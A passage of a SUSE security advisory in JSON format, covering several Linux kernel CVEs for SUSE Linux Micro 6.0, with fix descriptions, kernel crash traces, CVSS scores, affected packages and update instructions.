"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54006",
"url": "https://www.suse.com/security/cve/CVE-2023-54006"
},
{
"category": "external",
"summary": "SUSE Bug 1255591 for CVE-2023-54006",
"url": "https://bugzilla.suse.com/1255591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54006"
},
{
"cve": "CVE-2023-54008",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54008"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio_vdpa: build affinity masks conditionally\n\nWe try to build affinity mask via create_affinity_masks()\nunconditionally which may lead several issues:\n\n- the affinity mask is not used for parent without affinity support\n (only VDUSE support the affinity now)\n- the logic of create_affinity_masks() might not work for devices\n other than block. For example it\u0027s not rare in the networking device\n where the number of queues could exceed the number of CPUs. Such\n case breaks the current affinity logic which is based on\n group_cpus_evenly() who assumes the number of CPUs are not less than\n the number of groups. This can trigger a warning[1]:\n\n\tif (ret \u003e= 0)\n\t\tWARN_ON(nr_present + nr_others \u003c numgrps);\n\nFixing this by only build the affinity masks only when\n\n- Driver passes affinity descriptor, driver like virtio-blk can make\n sure to limit the number of queues when it exceeds the number of CPUs\n- Parent support affinity setting config ops\n\nThis help to avoid the warning. More optimizations could be done on\ntop.\n\n[1]\n[ 682.146655] WARNING: CPU: 6 PID: 1550 at lib/group_cpus.c:400 group_cpus_evenly+0x1aa/0x1c0\n[ 682.146668] CPU: 6 PID: 1550 Comm: vdpa Not tainted 6.5.0-rc5jason+ #79\n[ 682.146671] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\n[ 682.146673] RIP: 0010:group_cpus_evenly+0x1aa/0x1c0\n[ 682.146676] Code: 4c 89 e0 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc e8 1b c4 74 ff 48 89 ef e8 13 ac 98 ff 4c 89 e7 45 31 e4 e8 08 ac 98 ff eb c2 \u003c0f\u003e 0b eb b6 e8 fd 05 c3 00 45 31 e4 eb e5 cc cc cc cc cc cc cc cc\n[ 682.146679] RSP: 0018:ffffc9000215f498 EFLAGS: 00010293\n[ 682.146682] RAX: 000000000001f1e0 RBX: 0000000000000041 RCX: 0000000000000000\n[ 682.146684] RDX: ffff888109922058 RSI: 0000000000000041 RDI: 0000000000000030\n[ 682.146686] RBP: ffff888109922058 R08: ffffc9000215f498 R09: ffffc9000215f4a0\n[ 682.146687] R10: 00000000000198d0 R11: 0000000000000030 R12: ffff888107e02800\n[ 682.146689] R13: 0000000000000030 R14: 0000000000000030 R15: 0000000000000041\n[ 682.146692] FS: 00007fef52315740(0000) GS:ffff888237380000(0000) knlGS:0000000000000000\n[ 682.146695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 682.146696] CR2: 00007fef52509000 CR3: 0000000110dbc004 CR4: 0000000000370ee0\n[ 682.146698] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 682.146700] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 682.146701] Call Trace:\n[ 682.146703] \u003cTASK\u003e\n[ 682.146705] ? __warn+0x7b/0x130\n[ 682.146709] ? group_cpus_evenly+0x1aa/0x1c0\n[ 682.146712] ? report_bug+0x1c8/0x1e0\n[ 682.146717] ? handle_bug+0x3c/0x70\n[ 682.146721] ? exc_invalid_op+0x14/0x70\n[ 682.146723] ? asm_exc_invalid_op+0x16/0x20\n[ 682.146727] ? group_cpus_evenly+0x1aa/0x1c0\n[ 682.146729] ? group_cpus_evenly+0x15c/0x1c0\n[ 682.146731] create_affinity_masks+0xaf/0x1a0\n[ 682.146735] virtio_vdpa_find_vqs+0x83/0x1d0\n[ 682.146738] ? __pfx_default_calc_sets+0x10/0x10\n[ 682.146742] virtnet_find_vqs+0x1f0/0x370\n[ 682.146747] virtnet_probe+0x501/0xcd0\n[ 682.146749] ? vp_modern_get_status+0x12/0x20\n[ 682.146751] ? get_cap_addr.isra.0+0x10/0xc0\n[ 682.146754] virtio_dev_probe+0x1af/0x260\n[ 682.146759] really_probe+0x1a5/0x410",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54008",
"url": "https://www.suse.com/security/cve/CVE-2023-54008"
},
{
"category": "external",
"summary": "SUSE Bug 1255630 for CVE-2023-54008",
"url": "https://bugzilla.suse.com/1255630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54008"
},
{
"cve": "CVE-2023-54013",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54013"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Fix locking for runpm vs reclaim\n\nFor cases where icc_bw_set() can be called in callbaths that could\ndeadlock against shrinker/reclaim, such as runpm resume, we need to\ndecouple the icc locking. Introduce a new icc_bw_lock for cases where\nwe need to serialize bw aggregation and update to decouple that from\npaths that require memory allocation such as node/link creation/\ndestruction.\n\nFixes this lockdep splat:\n\n ======================================================\n WARNING: possible circular locking dependency detected\n 6.2.0-rc8-debug+ #554 Not tainted\n ------------------------------------------------------\n ring0/132 is trying to acquire lock:\n ffffff80871916d0 (\u0026gmu-\u003elock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234\n\n but task is already holding lock:\n ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #4 (dma_fence_map){++++}-{0:0}:\n __dma_fence_might_wait+0x74/0xc0\n dma_resv_lockdep+0x1f4/0x2f4\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x80/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n topology_parse_cpu_capacity+0x8c/0x178\n get_cpu_for_node+0x88/0xc4\n parse_cluster+0x1b0/0x28c\n parse_cluster+0x8c/0x28c\n init_cpu_topology+0x168/0x188\n smp_prepare_cpus+0x24/0xf8\n kernel_init_freeable+0x18c/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #2 (fs_reclaim){+.+.}-{0:0}:\n __fs_reclaim_acquire+0x3c/0x48\n fs_reclaim_acquire+0x54/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n kzalloc.constprop.0+0x14/0x20\n icc_node_create_nolock+0x4c/0xc4\n icc_node_create+0x38/0x58\n qcom_icc_rpmh_probe+0x1b8/0x248\n platform_probe+0x70/0xc4\n really_probe+0x158/0x290\n __driver_probe_device+0xc8/0xe0\n driver_probe_device+0x44/0x100\n __driver_attach+0xf8/0x108\n bus_for_each_dev+0x78/0xc4\n driver_attach+0x2c/0x38\n bus_add_driver+0xd0/0x1d8\n driver_register+0xbc/0xf8\n __platform_driver_register+0x30/0x3c\n qnoc_driver_init+0x24/0x30\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #1 (icc_lock){+.+.}-{3:3}:\n __mutex_lock+0xcc/0x3c8\n mutex_lock_nested+0x30/0x44\n icc_set_bw+0x88/0x2b4\n _set_opp_bw+0x8c/0xd8\n _set_opp+0x19c/0x300\n dev_pm_opp_set_opp+0x84/0x94\n a6xx_gmu_resume+0x18c/0x804\n a6xx_pm_resume+0xf8/0x234\n adreno_runtime_resume+0x2c/0x38\n pm_generic_runtime_resume+0x30/0x44\n __rpm_callback+0x15c/0x174\n rpm_callback+0x78/0x7c\n rpm_resume+0x318/0x524\n __pm_runtime_resume+0x78/0xbc\n adreno_load_gpu+0xc4/0x17c\n msm_open+0x50/0x120\n drm_file_alloc+0x17c/0x228\n drm_open_helper+0x74/0x118\n drm_open+0xa0/0x144\n drm_stub_open+0xd4/0xe4\n chrdev_open+0x1b8/0x1e4\n do_dentry_open+0x2f8/0x38c\n vfs_open+0x34/0x40\n path_openat+0x64c/0x7b4\n do_filp_open+0x54/0xc4\n do_sys_openat2+0x9c/0x100\n do_sys_open+0x50/0x7c\n __arm64_sys_openat+0x28/0x34\n invoke_syscall+0x8c/0x128\n el0_svc_common.constprop.0+0xa0/0x11c\n do_el0_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54013",
"url": "https://www.suse.com/security/cve/CVE-2023-54013"
},
{
"category": "external",
"summary": "SUSE Bug 1256280 for CVE-2023-54013",
"url": "https://bugzilla.suse.com/1256280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54013"
},
{
"cve": "CVE-2023-54014",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54014"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Check valid rport returned by fc_bsg_to_rport()\n\nKlocwork reported warning of rport maybe NULL and will be dereferenced.\nrport returned by call to fc_bsg_to_rport() could be NULL and dereferenced.\n\nCheck valid rport returned by fc_bsg_to_rport().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54014",
"url": "https://www.suse.com/security/cve/CVE-2023-54014"
},
{
"category": "external",
"summary": "SUSE Bug 1256300 for CVE-2023-54014",
"url": "https://bugzilla.suse.com/1256300"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54014"
},
{
"cve": "CVE-2023-54016",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54016"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: Fix memory leak in rx_desc and tx_desc\n\nCurrently when ath12k_dp_cc_desc_init() is called we allocate\nmemory to rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), during\ndescriptor cleanup rx_descs and tx_descs memory is not freed.\n\nThis is cause of memory leak. These allocated memory should be\nfreed in ath12k_dp_cc_cleanup.\n\nIn ath12k_dp_cc_desc_init(), we can save base address of rx_descs\nand tx_descs. In ath12k_dp_cc_cleanup(), we can free rx_descs and\ntx_descs memory using their base address.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54016",
"url": "https://www.suse.com/security/cve/CVE-2023-54016"
},
{
"category": "external",
"summary": "SUSE Bug 1256279 for CVE-2023-54016",
"url": "https://bugzilla.suse.com/1256279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54016"
},
{
"cve": "CVE-2023-54017",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54017"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: fix possible memory leak in ibmebus_bus_init()\n\nIf device_register() returns error in ibmebus_bus_init(), name of kobject\nwhich is allocated in dev_set_name() called in device_add() is leaked.\n\nAs comment of device_add() says, it should call put_device() to drop\nthe reference count that was set in device_initialize() when it fails,\nso the name can be freed in kobject_cleanup().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54017",
"url": "https://www.suse.com/security/cve/CVE-2023-54017"
},
{
"category": "external",
"summary": "SUSE Bug 1255605 for CVE-2023-54017",
"url": "https://bugzilla.suse.com/1255605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
